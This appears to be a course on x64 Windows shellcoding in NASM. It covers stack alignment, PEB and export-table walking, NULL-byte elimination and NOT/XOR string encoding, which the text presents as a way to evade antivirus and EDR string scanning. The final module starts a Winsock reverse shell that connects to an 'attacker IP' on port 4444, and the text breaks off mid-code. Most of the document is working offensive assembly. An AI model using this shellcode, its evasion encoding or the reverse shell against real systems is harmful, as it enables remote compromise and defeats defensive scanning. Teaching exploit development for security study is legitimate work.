g3tsyst3m // course material

x64 Assembly & Shellcoding 101

A ground-up practitioner's course in x64 NASM assembly — from registers and stack mechanics to position-independent shellcode and a fully functional reverse shell

x64 Windows · NASM Syntax · Intermediate · Shellcode Development · NULL-Free Techniques
01
Module One

x64 Essentials — Registers, Stack Alignment & Shadow Space

// The boring vital stuff that makes everything else work

Learning Objectives

  • Understand the x64 register set — volatile vs. non-volatile and why it matters for shellcode
  • Implement correct 16-byte stack alignment before every function call
  • Allocate and manage shadow space correctly in NASM
  • Pass 1–4+ parameters using the Windows x64 calling convention
  • Set up a working NASM build environment on Windows

Registers — Volatile vs. Non-Volatile

The x64 register set is the foundation of everything in this course. Before writing a single line of shellcode, you need to know which registers you can trust across function calls and which ones will be clobbered. Get this wrong and your shellcode will fail in subtle, maddening ways.

The Windows x64 ABI divides registers into two categories. Volatile registers (RAX, RCX, RDX, R8, R9, R10, R11) are scratch registers that any function call is free to destroy. If you store a value in RCX before a call, don't expect it to be there afterward. Non-volatile registers (RBX, RBP, RDI, RSI, RSP, R12–R15) must be preserved by the callee, so their values survive a call. For shellcode, we rely heavily on R12–R15 to store API handles and base addresses we need to keep throughout execution.

Register | Type         | Role in Shellcode                                                       | Sub-registers (64→8-bit)
RAX      | Volatile     | Return value from function calls; scratch                               | RAX → EAX → AX → AL/AH
RCX      | Volatile     | 1st function parameter                                                  | RCX → ECX → CX → CL
RDX      | Volatile     | 2nd function parameter                                                  | RDX → EDX → DX → DL
R8       | Volatile     | 3rd function parameter                                                  | R8 → R8D → R8W → R8B
R9       | Volatile     | 4th function parameter                                                  | R9 → R9D → R9W → R9B
R10/R11  | Volatile     | Scratch; not used for parameters (5th and later arguments go on the stack) | R10 → R10D → R10W → R10B (same pattern for R11)
RBX      | Non-Volatile | Loop counters, base pointers                                            | RBX → EBX → BX → BL
R12      | Non-Volatile | Store DLL base addresses (kernel32, user32)                             | R12 → R12D → R12W → R12B
R13      | Non-Volatile | Store resolved API addresses                                            | R13 → R13D → R13W → R13B
R14      | Non-Volatile | Store resolved API addresses                                            | R14 → R14D → R14W → R14B
R15      | Non-Volatile | Store resolved API addresses                                            | R15 → R15D → R15W → R15B
RSP      | Non-Volatile | Stack pointer; must be 16-byte aligned before calls                     | RSP only
RIP      | Special      | Instruction pointer; used in PIC code for addressing                    | RIP only

16-Byte Stack Alignment

This is one of the most important (and most confusing) aspects of x64 assembly for newcomers. The Windows x64 ABI requires that RSP be divisible by 16 (aligned to a 16-byte boundary) immediately before any call instruction. If you violate this, the called function is likely to crash: many Windows APIs use aligned SSE instructions such as movaps on stack locations, and those raise an access violation when RSP is off by 8.

The simplest mental model: the last hex digit of RSP must be 0 before a call. Instructions that modify RSP by 8 bytes each — push and pop — flip it between aligned and unaligned. Track your pushes and pops carefully.

Quick check: If RSP ends in 8 (e.g., 0x...ff8) you're misaligned by 8. A single push rax or sub rsp, 8 will re-align it. If it ends in 0 you're good to call.
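The quick check above is plain modular arithmetic, so it can be sanity-tested outside a debugger. The sketch below is a minimal illustration; the RSP value is hypothetical and the helper names are not part of the course code.

```python
def misalignment(rsp: int) -> int:
    """Bytes by which RSP is past the previous 16-byte boundary (0 means aligned)."""
    return rsp % 16


def is_call_ready(rsp: int) -> bool:
    """True when RSP satisfies the 16-byte rule that must hold before a call."""
    return misalignment(rsp) == 0


def force_align(rsp: int) -> int:
    """Model of `and rsp, 0xFFFFFFFFFFFFFFF0`: clear the low four bits."""
    return rsp & ~0xF


entry_rsp = 0x14FF28                 # hypothetical RSP at entry, ends in 8
print(is_call_ready(entry_rsp))      # misaligned: the return address was just pushed
after_push = entry_rsp - 8           # effect of one `push rax` (or `sub rsp, 8`)
print(hex(after_push), is_call_ready(after_push))
print(hex(force_align(entry_rsp)))   # the mask lands on the same boundary
```

Note that the mask can only move RSP downward, which is why it is safe to apply at entry: it never exposes live stack data above the current pointer.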
NASM x64 stack_align_example.asm — demonstrating alignment mechanics
; Stack alignment demonstration
; Entry point: RSP is typically misaligned here by 8 (CALL pushed return addr)
; Fix it immediately at the top of your code:
    sub rsp, 0x28                   ; 0x20 shadow space + 0x8 to fix alignment = 0x28
    and rsp, 0xFFFFFFFFFFFFFFF0     ; nuclear option: force-align RSP (use at entry if unsure)

; Before a call with 4 or fewer args, allocate shadow space:
    sub rsp, 0x30                   ; 0x20 shadow + 0x10 to maintain 16-byte alignment
    call r15                        ; call our stored API address
    add rsp, 0x30                   ; restore RSP after the call

; WinExec example: 2 parameters (RCX, RDX)
    pop r15                         ; WinExec address previously pushed onto stack
    xor rax, rax                    ; zero RAX (we'll use this for NULL terminator trick later)
    push rax                        ; push NULL: RSP now misaligned (odd push count)
    mov rax, 0x6578652E636C6163     ; "calc.exe" in little-endian hex
    push rax                        ; push string: RSP now aligned again (even push count)
    mov rcx, rsp                    ; RCX (1st param) = pointer to "calc.exe" string
    mov rdx, 1                      ; RDX (2nd param) = SW_SHOWNORMAL
    sub rsp, 0x30                   ; shadow space allocation, keeps alignment
    call r15                        ; WinExec("calc.exe", 1)
    add rsp, 0x30                   ; restore shadow space

Shadow Space

Shadow space (also called the "home space" or "spill area") is 32 bytes (4 × 8-byte slots) that the caller must allocate on the stack before every call. Even if a function takes zero arguments, you must allocate sub rsp, 0x20 worth of shadow space. The callee uses this space to spill its register parameters to memory if needed — but that's the callee's business. Your job as the caller is just to make sure it's there.

In practice, you'll almost always see sub rsp, 0x28 or sub rsp, 0x30 before a call — the extra 8 or 16 bytes are to maintain 16-byte alignment on top of the 32-byte shadow requirement.

Calling Convention — Passing Parameters

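Windows x64 uses a register-based calling convention for the first four arguments. Arguments 5 and beyond go on the stack directly above the shadow space. From the caller's side, immediately before the call instruction, they sit at [RSP+0x20], [RSP+0x28], and so on; inside the callee, after the return address has been pushed, the same slots appear at [RSP+0x28], [RSP+0x30], etc. This is one of the trickiest parts of the reverse shell module, where CreateProcessA takes ten arguments and one of them points to a STARTUPINFOA structure with many fields.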
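To make the layout concrete, here is a small sketch that maps an argument count to locations as seen by the caller just before the call instruction (the callee sees each stack slot 8 bytes higher, because the return address has been pushed). The helper names are illustrative, and the frame size assumes RSP is already 16-byte aligned before the `sub rsp`.

```python
REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"]   # first four integer/pointer arguments
SHADOW_SPACE = 0x20                          # 4 slots x 8 bytes, always reserved


def arg_locations(count: int) -> list[str]:
    """Where each argument lives, from the caller's view right before `call`."""
    locations = []
    for index in range(count):
        if index < 4:
            locations.append(REGISTER_ARGS[index])
        else:
            offset = SHADOW_SPACE + (index - 4) * 8
            locations.append(f"[RSP+0x{offset:02X}]")
    return locations


def frame_size(count: int) -> int:
    """Bytes for `sub rsp, N`: shadow space plus stack args, rounded up to 16."""
    stack_args = max(0, count - 4)
    return (SHADOW_SPACE + stack_args * 8 + 15) & ~15


print(arg_locations(6))        # four registers, then two stack slots
print(hex(frame_size(6)))      # WSASocketA-style call with six arguments
print(hex(frame_size(10)))     # CreateProcessA-style call with ten arguments
```

Reserving the whole frame with one `sub rsp` and writing stack arguments with `mov [rsp+offset], reg` keeps alignment easier to reason about than mixing pushes with shadow-space allocation.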


02
Module Two

PE Structure & Walking the Export Table

// Finding WinExec without importing anything

Learning Objectives

  • Navigate the PEB to locate kernel32.dll base address without any imports
  • Walk the PE export directory to resolve function addresses by name hash
  • Understand the AddressOfNames → Ordinals → AddressOfFunctions lookup chain
  • Use Pepper PE Viewer to manually verify offsets before coding them
  • Write the foundational export-table-walking stub that every shellcode in this course builds on

Why Walk the PE Table?

Position-independent shellcode can't import functions the normal way — there's no Import Address Table (IAT) at a fixed address. Instead, we locate what we need at runtime by walking the Process Environment Block (PEB) to find loaded modules, then parsing the PE export table of each module to resolve function addresses by name. This technique is used in virtually every non-trivial shellcode payload in the wild.

The chain: GS:[0x60] → PEB → PEB_LDR_DATA → InMemoryOrderModuleList → kernel32 base → PE headers → Export Directory → AddressOfNames / AddressOfFunctions

PEB Walk — Locating kernel32.dll

The PEB (Process Environment Block) is accessible at GS:[0x60] in x64. It contains a pointer to PEB_LDR_DATA at offset 0x18, which contains the InMemoryOrderModuleList at offset 0x20. This doubly-linked list contains every loaded module. In standard Windows processes the order is the process's own image, then ntdll.dll, then kernel32.dll, so the third entry is kernel32.dll.

NASM x64 peb_walk.asm — locate kernel32.dll base address via PEB
; peb_walk.asm - g3tsyst3m Module 2
; Locate kernel32.dll base address via the PEB InMemoryOrderModuleList
; Result: kernel32 base address in R8 (R8 is volatile, so copy it to a
;         non-volatile register such as R12 before calling any API)

    sub rsp, 0x28                   ; stack alignment + shadow space prologue
    and rsp, 0xFFFFFFFFFFFFFFF0     ; force-align RSP

; ── Step 1: Get PEB address from GS segment register ──
    mov rax, [gs:0x60]              ; RAX = PEB base address

; ── Step 2: Get PEB_LDR_DATA ──
    mov rax, [rax+0x18]             ; RAX = PEB->Ldr (PEB_LDR_DATA*)

; ── Step 3: Walk InMemoryOrderModuleList (image → ntdll → kernel32) ──
    mov rax, [rax+0x20]             ; RAX = first entry (the process's own image)
    mov rax, [rax]                  ; RAX = second entry (ntdll.dll)
    mov rax, [rax]                  ; RAX = third entry (kernel32.dll)

; ── Step 4: Extract DllBase (base address) ──
; RAX points at the entry's InMemoryOrderLinks field; DllBase sits 0x20 past it
    mov r8, [rax+0x20]              ; R8 = kernel32.dll base address
    mov rbx, r8                     ; RBX = kernel32 base (working copy for PE parsing)

; ── Step 5: Navigate to PE header ──
    mov ebx, [rbx+0x3C]             ; EBX = RVA of PE signature (e_lfanew field); upper half of RBX is zeroed
    add rbx, r8                     ; RBX = VMA of PE header (kernel32 base + RVA)

Export Directory Walk — Resolving WinExec

With the PE header address in hand, we navigate to the Export Directory and walk three parallel arrays: AddressOfNames (function name strings), AddressOfNameOrdinals (index mapping names to functions), and AddressOfFunctions (actual RVAs). The lookup: search AddressOfNames for our target string → get the ordinal index → use that to index into AddressOfFunctions → add kernel32 base to get the VMA.
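The three-array lookup is easier to follow with plain lists standing in for the export tables. The sketch below is a model only: the names, ordinals, RVAs, and image base are made-up values, not real kernel32 data.

```python
def resolve_export(names, name_ordinals, functions, image_base, target):
    """Model of the export lookup: name index -> ordinal index -> function RVA -> address."""
    for name_index, name in enumerate(names):
        if name == target:
            function_index = name_ordinals[name_index]   # AddressOfNameOrdinals[i]
            rva = functions[function_index]              # AddressOfFunctions[ordinal]
            return image_base + rva                      # RVA + base = virtual address
    return None                                          # name not exported


# Hypothetical tables: note that name order and function order differ,
# which is exactly why the ordinal array is needed in between.
names = ["Beep", "CloseHandle", "WinExec"]
name_ordinals = [0, 2, 1]
functions = [0x1000, 0x5F80, 0x2340]
image_base = 0x7FF800000000

address = resolve_export(names, name_ordinals, functions, image_base, "WinExec")
print(hex(address))
```

Indexing AddressOfFunctions directly with the name index is a common mistake; it happens to work only when the two arrays are in the same order.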

NASM x64 export_walk.asm — walk PE export table to resolve WinExec
; export_walk.asm - g3tsyst3m Module 2
; Continues from peb_walk.asm: RBX = PE header VMA, R8 = kernel32 base
; Goal: resolve WinExec address into R15

; ── Navigate to Export Directory ──
; Export Directory RVA is at PE_header+0x88 (IMAGE_OPTIONAL_HEADER64 DataDirectory[0])
    xor rcx, rcx                    ; clear RCX
    add cx, 0x88ff                  ; add 0x88ff to lower 16 bits (NULL-free trick for 0x88)
    shr rcx, 0x8                    ; shift right: RCX = 0x88 (our export dir offset)
    mov edx, [rbx+rcx]              ; EDX = Export Directory RVA
    add rdx, r8                     ; RDX = Export Directory VMA

; ── Get the entry count and AddressOfNames ──
    mov r10d, [rdx+0x14]            ; R10D = NumberOfFunctions
    xor r11, r11                    ; R11 = 0 (index counter)
    mov r12d, [rdx+0x20]            ; R12D = AddressOfNames RVA
    add r12, r8                     ; R12 = AddressOfNames VMA

; ── Load target function name "WinExec" onto stack for comparison ──
    mov ecx, r10d                   ; RCX = loop counter for jecxz (RDX keeps the Export Directory pointer)
    mov rax, 0x6F9C9A87BA9196A8     ; NOT-encoded 0x90 + "WinExec" (Module 4 style)
    not rax                         ; decode: RAX = 0x90636578456E6957
    shl rax, 0x8                    ; shift the 0x90 placeholder out
    shr rax, 0x8                    ; shift back: a zero byte now terminates the string
    push rax                        ; push "WinExec\0" to stack
    mov rax, rsp                    ; RAX = pointer to "WinExec" string
    add rsp, 0x8                    ; release the slot (the string stays readable only until the next push or call)

; ── Name search loop ──
findname:
    jecxz done                      ; if ECX counter = 0, we've exhausted names (not found)
    xor rbx, rbx
    mov ebx, [r12+r11*4]            ; EBX = AddressOfNames[i] RVA
    add rbx, r8                     ; RBX = function name string VMA
    dec rcx                         ; decrement counter
    mov r13, [rbx]                  ; R13 = first 8 bytes of function name
    cmp r13, [rax]                  ; compare with our target "WinExec"
    je found
    inc r11                         ; increment name index
    jmp findname

found:
; ── Get ordinal → function address ──
    xor r13, r13
    mov r13d, [rdx+0x24]            ; R13D = AddressOfNameOrdinals RVA
    add r13, r8                     ; R13 = AddressOfNameOrdinals VMA
    movzx r13d, word [r13+r11*2]    ; R13 = ordinal index for our function (zero-extended)
    xor r14, r14
    mov r14d, [rdx+0x1C]            ; R14D = AddressOfFunctions RVA
    add r14, r8                     ; R14 = AddressOfFunctions VMA
    mov eax, [r14+r13*4]            ; EAX = WinExec function RVA
    add rax, r8                     ; RAX = WinExec VMA (final resolved address!)
    mov r15, rax                    ; R15 = WinExec address (non-volatile storage)
done:

03
Module Three

NULL Byte Elimination

// Making shellcode actually usable in the real world

Learning Objectives

  • Identify every source of null bytes in x64 assembly output using objdump
  • Apply shift-based null termination to push strings without null bytes in shellcode
  • Use XOR + ADD tricks for loading memory offsets that would otherwise produce nulls
  • Verify null-free output and extract clean shellcode bytes

Why NULL Bytes Break Shellcode

Many classic shellcode delivery mechanisms (stack-based buffer overflows through string-copy functions, format string exploits, and string-copy loaders) treat 0x00 as a string terminator. If your shellcode contains a null byte, the delivery mechanism stops copying at that point and your payload is truncated. For any delivery path that handles the payload as a C string, NULL-free shellcode is a requirement, not an option.
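Checking for the problem is a simple byte scan. The sketch below is a minimal illustration with an illustrative helper name; the two byte strings are the standard encodings of `mov eax, 0` and `xor rax, rax`.

```python
def find_nulls(code: bytes) -> list[int]:
    """Return the offset of every 0x00 byte in an assembled byte string."""
    return [offset for offset, value in enumerate(code) if value == 0]


mov_eax_zero = bytes.fromhex("b800000000")   # mov eax, 0   (immediate is four zero bytes)
xor_rax_rax = bytes.fromhex("4831c0")        # xor rax, rax (same effect, no zero bytes)

print(find_nulls(mov_eax_zero))   # offsets of the zero immediate
print(find_nulls(xor_rax_rax))    # empty list: safe for string-based delivery
```

Reporting offsets rather than a yes/no answer makes it easier to map each hit back to the instruction that produced it in the disassembly.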

The good news: every instruction that produces a null byte has a null-free equivalent, just less obvious. The core techniques are shift-based string null-termination, XOR/ADD for zero values, and careful register sizing.
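The shift-based techniques can be checked with 64-bit integer arithmetic before committing them to assembly. This is a sketch that models register behavior in Python under the assumption of 64-bit wraparound; the helper names are illustrative.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def shl64(value: int, bits: int) -> int:
    """Model of `shl r64, bits`: bits shifted past bit 63 are discarded."""
    return (value << bits) & MASK64


def shr64(value: int, bits: int) -> int:
    """Model of `shr r64, bits`: zeros enter from the top."""
    return value >> bits


# String termination: 0x90 placeholder in the top byte, "WinExec" below it.
immediate = 0x90636578456E6957
assert 0 not in immediate.to_bytes(8, "little")      # nothing null in the instruction bytes
terminated = shr64(shl64(immediate, 8), 8)
print(terminated.to_bytes(8, "little"))              # the pushed qword, in memory order

# Offset building: `add cx, 0x88ff` then `shr rcx, 8`, starting from RCX = 0.
rcx = 0
rcx = (rcx & ~0xFFFF) | ((rcx + 0x88FF) & 0xFFFF)    # 16-bit add touches only CX
rcx = shr64(rcx, 8)
print(hex(rcx))
```

The same model works for any string of up to seven characters: pick a placeholder byte that is non-zero, and the two shifts replace it with the terminator at run time.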

NASM x64 null_removal.asm — key techniques for eliminating null bytes
; null_removal.asm - g3tsyst3m Module 3
; Core techniques for NULL-free shellcode

; ── Technique 1: XOR to zero a register (no null bytes) ──
; BAD:  mov rax, 0   → the zero immediate is emitted as 0x00 bytes, whichever encoding the assembler picks
; GOOD: xor rax, rax → produces \x48\x31\xc0 (3 bytes, zero nulls)
    xor rax, rax                    ; zero RAX: the canonical null-free zeroing idiom
    xor rcx, rcx                    ; same for RCX (first parameter)

; ── Technique 2: Shift-based string null termination ──
; Goal: push "WinExec\0" without embedding a 0x00 byte in our shellcode
; "WinExec" = 7 bytes. We load 8 bytes where the most significant byte = 0x90 (placeholder)
    mov rax, 0x90636578456E6957     ; 0x90 + "WinExec": 0x90 is our non-null placeholder
    shl rax, 0x8                    ; shift left 8 bits → 0x636578456E695700 (0x90 shifted out, zero enters at the LSB)
    shr rax, 0x8                    ; shift right 8 bits → 0x00636578456E6957 (zero byte now in the MSB position)
    push rax                        ; stack now has "WinExec\0": the null is IN MEMORY, not in shellcode!

; ── Technique 3: ADD/SHR trick for NULL-free memory offsets ──
; Problem: mov edx, [rbx+0x88] → 0x88 does not fit in a signed 8-bit displacement,
; so it is encoded as the 32-bit displacement 88 00 00 00 (three nulls).
; Use register indirection instead:
    xor rcx, rcx                    ; zero RCX
    add cx, 0x88ff                  ; add 0x88ff to CX (16-bit): no null bytes in this encoding
    shr rcx, 0x8                    ; shift right 8 → RCX = 0x88 (the value we wanted)
    mov edx, [rbx+rcx]              ; now use RCX as the offset: no null in encoding!

; ── Technique 4: Use JECXZ instead of loop with potential null branch ──
; jecxz (jump if ECX is zero) is 3 bytes in 64-bit mode (0x67 prefix; jrcxz is 2)
; and null-free as long as the jump displacement is non-zero
    jecxz done                      ; jump to done if ECX = 0 (exhausted function names)

; ── Verification: use objdump to check for nulls ──
; objdump -d -M intel shellcode.o | grep " 00 "
; Any line with " 00 " in the hex column is a null byte: fix it!

04
Module Four

String Encoding with Bitwise Operations

// Defeating static analysis without an encoder framework

Learning Objectives

  • Encode string literals using the NOT instruction to defeat static AV string scanning
  • Use the Windows Calculator to pre-compute NOT values without writing a script
  • Apply XOR encoding as an alternative to NOT for string obfuscation
  • Understand the limits of single-instruction encoding vs. full encryption

Why Encode Strings in Shellcode?

Static analysis tools (antivirus, YARA rules, EDR file scanning) look for recognizable strings like WinExec, calc.exe, cmd.exe, and Windows API names in binary files. If your shellcode contains these as plaintext, a simple string scan will flag it before it ever executes. The NOT instruction gives us a one-instruction decode that costs only a few bytes and keeps those plaintext strings out of the stored bytes. It hides them from string matching only, not from analysis that emulates or runs the code.
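The Calculator step described in this module is a bitwise NOT on a 64-bit value, which a few lines of Python can reproduce and verify. This is a sketch; `pack_le` and `not64` are illustrative names, and the 0x90 pad byte follows the placeholder convention from Module 3.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def pack_le(text: bytes, pad: int = 0x90) -> int:
    """Pack up to 8 bytes as a little-endian qword, padding the top with `pad`."""
    if len(text) > 8:
        raise ValueError("one register holds at most 8 bytes")
    return int.from_bytes(text.ljust(8, bytes([pad])), "little")


def not64(value: int) -> int:
    """Model of `not r64`: flip all 64 bits."""
    return ~value & MASK64


for label in (b"WinExec", b"calc.exe"):
    plain = pack_le(label)
    encoded = not64(plain)
    assert not64(encoded) == plain                  # NOT is its own inverse
    assert 0 not in encoded.to_bytes(8, "little")   # holds here; a 0xFF source byte would break it
    print(label, hex(plain), hex(encoded))
```

Because NOT maps 0xFF to 0x00, the encoded value is NULL-free only when the packed source contains no 0xFF byte, which is true for ordinary ASCII names.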

NASM x64 not_encoding.asm — NOT-based string encoding for static analysis evasion
; not_encoding.asm - g3tsyst3m Module 4
; Encode strings using NOT instruction: defeats simple string scanning
; Pre-computation: take your target string's hex value and NOT it in the Calculator
; Store the NOT'd value in shellcode → at runtime, NOT it back to the original

; ── Encoding "WinExec" with NOT ──
; "WinExec" as a little-endian immediate: 0x636578456E6957 (7 bytes)
; With the 0x90 placeholder in the top byte: 0x90636578456E6957
; Apply NOT: ~0x90636578456E6957 = 0x6F9C9A87BA9196A8
; This is what we store: static scanners see 0x6F9C9A87BA9196A8, not "WinExec"
    mov rax, 0x6F9C9A87BA9196A8     ; NOT'd "WinExec" (stored in shellcode)
    not rax                         ; decode at runtime → RAX = 0x90636578456E6957
    shl rax, 0x8                    ; shift placeholder out
    shr rax, 0x8                    ; RAX = "WinExec\0", ready to push
    push rax

; ── Encoding "calc.exe" with NOT ──
; Original: 0x6578652E636C6163 → NOT'd: 0x9A879AD19C939E9C
    mov rax, 0x9A879AD19C939E9C     ; NOT'd "calc.exe"
    not rax                         ; decode → RAX = "calc.exe"
    push rax                        ; push decoded string (already 8 bytes, no shl/shr needed)
    mov rcx, rsp                    ; RCX = pointer to "calc.exe"

; ── Using Windows Calculator to pre-compute NOT values ──
; 1. Open Calculator → Programmer mode
; 2. Enter your string hex value
; 3. Click NOT → result is your encoded value to embed in shellcode
; 4. To verify: NOT(NOT(x)) = x, so a double NOT should give you back the original

; ── XOR encoding as an alternative ──
; Choose any non-null key byte (e.g., 0xAA) that never equals a byte of the string,
; because equal bytes XOR to 0x00
    mov rax, 0x3AC9CFD2EFC4C3FD     ; 0x90636578456E6957 XOR 0xAAAAAAAAAAAAAAAA
    mov rdx, 0xAAAAAAAAAAAAAAAA     ; key goes in a register: XOR has no 64-bit immediate form
    xor rax, rdx                    ; XOR back with same key → 0x90636578456E6957

05
Module Five

Dynamic API Resolution with GetProcAddress

// Popping a MessageBox the hard way — and why it matters

Learning Objectives

  • Use GetProcAddress and LoadLibraryA to load user32.dll and resolve MessageBoxA
  • Manage the 4-parameter calling convention for MessageBoxA in x64 assembly
  • Locate ExitProcess to cleanly terminate shellcode without crashing
  • Build a reusable API resolution stub for use in more complex shellcode

Beyond kernel32 — Loading Additional DLLs

Our PE-walking technique from Module 2 locates functions in kernel32.dll. But shellcode often needs APIs from other DLLs: user32.dll for UI functions, ws2_32.dll for sockets, ntdll.dll for native APIs. The solution: use GetProcAddress and LoadLibraryA (both in kernel32) to dynamically load any DLL and resolve any function at runtime. This is the API resolution pattern used in the pure-assembly reverse shell in Module 7 (Module 6 links the same APIs through EXTERN declarations instead).
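Names longer than eight bytes have to be pushed as several qwords, last chunk first, so that the string reads forward in memory. The sketch below derives those values for a given name; `push_immediates` is an illustrative helper, and it emits plain zero-padded values, so any chunk containing 0x00 bytes still needs a Module 3 trick if NULL-free output matters.

```python
def push_immediates(name: bytes) -> list[int]:
    """Qword values to push, in push order, so `name` plus a terminator lands at RSP."""
    data = name + b"\x00"                                   # C-string terminator
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    # The stack grows downward, so the tail of the string is pushed first.
    return [int.from_bytes(chunk.ljust(8, b"\x00"), "little") for chunk in reversed(chunks)]


for api_name in (b"ExitProcess", b"user32.dll", b"MessageBoxA"):
    values = push_immediates(api_name)
    print(api_name.decode(), [hex(value) for value in values])
```

A name that is exactly eight bytes long, such as calc.exe, yields a zero qword followed by the string qword, matching the push NULL then push string sequence used earlier in the course.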

NASM x64 getprocaddress.asm — dynamic API resolution and MessageBoxA pop
; getprocaddress.asm - g3tsyst3m Module 5
; Resolve GetProcAddress via PE walk, then use it to load user32.dll and MessageBoxA
; Prerequisite: PE walk completed from Module 2, kernel32 base saved in R12
; (assumption: R8 is volatile, so the base must live in a non-volatile register)

; ── Locate GetProcAddress ── (using same PE walk, searching for "GetProcAddress")
; Result stored in R14 (non-volatile)
; ── Locate LoadLibraryA ──
; Result stored in R15 (non-volatile)

; ── Locate ExitProcess ──
    mov r13, r14                    ; keep GetProcAddress in R13 (R14 is reused for ExitProcess below)
    mov rcx, r12                    ; RCX = kernel32 module handle (1st param)
; Push "ExitProcess" string NULL-free:
    mov rax, 0x90737365             ; "ess" + 0x90 placeholder, 4-byte value
    shl eax, 0x8                    ; 0x73736500: placeholder shifted out
    shr eax, 0x8                    ; 0x00737365 = "ess\0"
    push rax                        ; push "ess\0"
    mov rax, 0x636F725074697845     ; "ExitProc" (little-endian)
    push rax                        ; push "ExitProc"
    mov rdx, rsp                    ; RDX = pointer to "ExitProcess" string
    sub rsp, 0x30
    call r13                        ; GetProcAddress(kernel32, "ExitProcess")
    add rsp, 0x30
    mov r14, rax                    ; R14 = ExitProcess address

; ── Load user32.dll ──
    xor rax, rax
    mov ax, 0x6C6C                  ; "ll": the upper bytes of RAX stay zero and terminate the string
    push rax
    mov rax, 0x642E323372657375     ; "user32.d" little-endian
    push rax
    mov rcx, rsp                    ; RCX = "user32.dll"
    sub rsp, 0x30
    call r15                        ; LoadLibraryA("user32.dll")
    add rsp, 0x30
    mov rdi, rax                    ; RDI = user32.dll base address

; ── Resolve MessageBoxA from user32.dll ──
    mov rcx, rdi                    ; RCX = user32.dll handle
    mov eax, 0x41786F               ; "oxA": last 3 bytes of "MessageBoxA" (this immediate contains a 0x00 byte;
                                    ; use the Module 3 shift trick where NULL-free output matters)
    push rax
    mov rax, 0x426567617373654D     ; "MessageB" in little-endian
    push rax
    mov rdx, rsp                    ; RDX = "MessageBoxA"
    sub rsp, 0x30
    call r13                        ; GetProcAddress(user32, "MessageBoxA")
    add rsp, 0x30
    mov r15, rax                    ; R15 = MessageBoxA address

; ── Call MessageBoxA(NULL, "g3tsyst3m", "g3tsyst3m", MB_OK) ──
    xor rcx, rcx                    ; RCX = NULL (no owner window)
    mov rax, 0x006D                 ; "m\0": final char of "g3tsyst3m"
    push rax
    mov rax, 0x3374737973743367     ; "g3tsyst3" in little-endian
    push rax
    mov rdx, rsp                    ; RDX = lpText = "g3tsyst3m"
    mov r8, rsp                     ; R8 = lpCaption = same string
    xor r9d, r9d                    ; R9 = uType = MB_OK (0)
    sub rsp, 0x30
    call r15                        ; MessageBoxA: pops the g3tsyst3m box!
    add rsp, 0x30

06
Module Six

Reverse Shell — Using Extern APIs

// Building your first reverse shell the easy way before doing it the hard way

Learning Objectives

  • Understand the Winsock API chain required for a TCP reverse shell
  • Use EXTERN declarations to link against ws2_32.lib and kernel32.lib
  • Populate the STARTUPINFOA structure correctly in x64 assembly
  • Redirect stdin/stdout/stderr to a socket handle for shell I/O
  • Compile and link a functional reverse shell executable with MinGW-w64

The Extern Approach — Learning Before the Deep End

A full dynamic reverse shell (Module 7) requires resolving 6+ socket APIs manually via PE walking — that's 500+ lines of assembly and a significant complexity jump. Module 6 uses EXTERN declarations to link against the APIs directly, producing a clean, readable reverse shell that demonstrates the logic without the noise. Think of it as a scaffold: understand the control flow here, then Module 7 removes the training wheels.

NASM x64 asmsock_extern.asm — reverse shell using EXTERN API declarations
; asmsock_extern.asm — g3tsyst3m Module 6 ; Reverse shell via extern APIs — compile+link: ; nasm -f win64 asmsock_extern.asm -o asmsock.obj ; ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32 BITS 64 section .text global main ; ── Extern declarations — linker resolves these from ws2_32/kernel32 ── extern WSAStartup extern WSASocketA extern WSAConnect extern CreateProcessA extern ExitProcess main: sub rsp, 0x28 and rsp, 0xFFFFFFFFFFFFFFF0 ; ── WSAStartup(0x0202, &wsaData) ── sub rsp, 0x200 ; allocate space for WSADATA structure (408 bytes) mov rcx, 0x0202 ; wVersionRequired = 2.2 mov rdx, rsp ; &wsaData sub rsp, 0x30 call WSAStartup add rsp, 0x30 ; ── WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, NULL, 0, 0) ── xor rcx, rcx mov cl, 2 ; AF_INET xor rdx, rdx mov dl, 1 ; SOCK_STREAM xor r8, r8 mov r8b, 6 ; IPPROTO_TCP xor r9, r9 ; lpProtocolInfo = NULL ; 5th param (0) and 6th param (0) go on stack above shadow space: xor rax, rax push rax ; dwFlags = 0 (6th param) push rax ; g = 0 (5th param) sub rsp, 0x20 ; shadow space call WSASocketA ; returns socket handle in RAX add rsp, 0x30 ; restore (shadow + 2 stack params) mov rdi, rax ; RDI = socket handle (preserve in non-volatile) ; ── Build SOCKADDR_IN structure on stack ── ; struct { WORD family; WORD port; DWORD addr; BYTE zero[8]; } xor rax, rax push rax ; padding zeros (8 bytes) push rax ; sin_addr = 0.0.0.0 (replaced: use your attacker IP) ; IP 192.168.1.100 in network byte order (big-endian): 0xC0A80164 mov eax, 0x6401A8C0 ; 192.168.1.100 in little-endian (flip for network order) push rax ; Port 4444 = 0x115C → network byte order = 0x5C11 mov ax, 0x5C11 ; htons(4444) xor rcx, rcx mov cx, 2 ; AF_INET shl rcx, 16 or rcx, rax ; combine family + port into one QWORD push push rcx mov rdx, rsp ; RDX = &SOCKADDR_IN ; ── WSAConnect(socket, &sockaddr, sizeof(sockaddr), NULL, NULL, NULL, NULL) ── mov rcx, rdi ; socket handle xor r8, r8 mov r8b, 16 ; sizeof(SOCKADDR_IN) xor 
